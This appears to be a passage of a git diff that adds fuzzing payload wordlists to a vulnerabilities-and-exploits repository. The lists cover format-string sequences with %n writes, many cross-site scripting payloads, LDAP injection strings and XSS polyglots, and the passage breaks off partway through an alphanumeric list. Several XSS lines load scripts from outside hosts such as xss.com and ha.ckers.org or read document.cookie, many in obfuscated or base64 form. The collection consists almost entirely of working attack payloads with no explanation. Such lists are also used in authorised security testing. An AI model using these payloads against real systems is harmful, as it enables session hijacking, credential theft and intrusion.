%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
110
Vulnerabilities_and_Exploits/fuzzing/JHADDIX_XSS.txt
Executable file
110
Vulnerabilities_and_Exploits/fuzzing/JHADDIX_XSS.txt
Executable file
|
@ -0,0 +1,110 @@
|
|||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
' onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
||||
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a href="javascript:\u0061le%72t(1)"><button>
|
||||
<div onmouseover='alert(1)'>DIV</div>
|
||||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script -->
|
||||
<script src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src \/\/onload = prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input value=<><iframe/src=javascript:confirm(1)
|
||||
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script .com
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||
<svg><script ?>alert(1)
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img src=`xx:xx`onerror=alert(1)>
|
||||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||
<object data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||
<svg><script>//
confirm(1);</script </svg>
|
||||
<svg><script onlypossibleinopera:-)> alert(1)
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
<script x> alert(1) </script 1=2
|
||||
<div/onmouseover='alert(1)'> style="x:">
|
||||
<--`<img/src=` onerror=alert(1)> --!>
|
||||
<script/src=data:text/javascript,alert(1)></script> ?
|
||||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||
<form><button formaction=javascript:alert(1)>CLICKME
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||
"><img src=x onerror=prompt(1);>
|
1617
Vulnerabilities_and_Exploits/fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
Executable file
1617
Vulnerabilities_and_Exploits/fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
Executable file
File diff suppressed because it is too large
Load diff
26
Vulnerabilities_and_Exploits/fuzzing/LDAP_FUZZ.txt
Executable file
26
Vulnerabilities_and_Exploits/fuzzing/LDAP_FUZZ.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
||||
*()|&'
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
*)(uid=*))(|(uid=*
|
74
Vulnerabilities_and_Exploits/fuzzing/RSNAKE_XSS.txt
Executable file
74
Vulnerabilities_and_Exploits/fuzzing/RSNAKE_XSS.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
# credit to rsnake
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
14
Vulnerabilities_and_Exploits/fuzzing/XSS_Polyglots.txt
Executable file
14
Vulnerabilities_and_Exploits/fuzzing/XSS_Polyglots.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||||
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
|
||||
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||||
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||||
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
|
||||
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
|
||||
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
|
||||
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
|
||||
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
|
||||
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
|
||||
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||||
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
62
Vulnerabilities_and_Exploits/fuzzing/alphanum_case.txt
Executable file
62
Vulnerabilities_and_Exploits/fuzzing/alphanum_case.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
0
|
||||
1
|
||||
2
|
||||
3
|
||||
4
|
||||
5
|
||||
6
|
||||
7
|
||||
8
|
||||
9
|
||||
a
|
||||
b
|
||||
c
|
||||
d
|
||||
e
|
||||
f
|
||||
g
|
||||
h
|
||||
i
|
||||
j
|
||||
k
|
||||
l
|
||||
m
|
||||
n
|
||||
o
|
||||
p
|
||||
q
|
